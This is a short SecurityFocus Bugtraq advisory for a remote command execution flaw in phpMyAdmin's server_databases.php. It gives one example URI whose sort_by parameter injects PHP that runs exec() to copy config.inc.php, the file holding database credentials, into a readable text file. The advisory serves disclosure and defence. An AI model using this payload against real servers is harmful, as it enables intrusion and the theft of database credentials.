Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

phpMyAdmin 'server_databases.php' Remote Command Execution Vulnerability

The following example URI is available:

http://www.example.com/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token]







 

Privacy Statement
Copyright 2008, SecurityFocus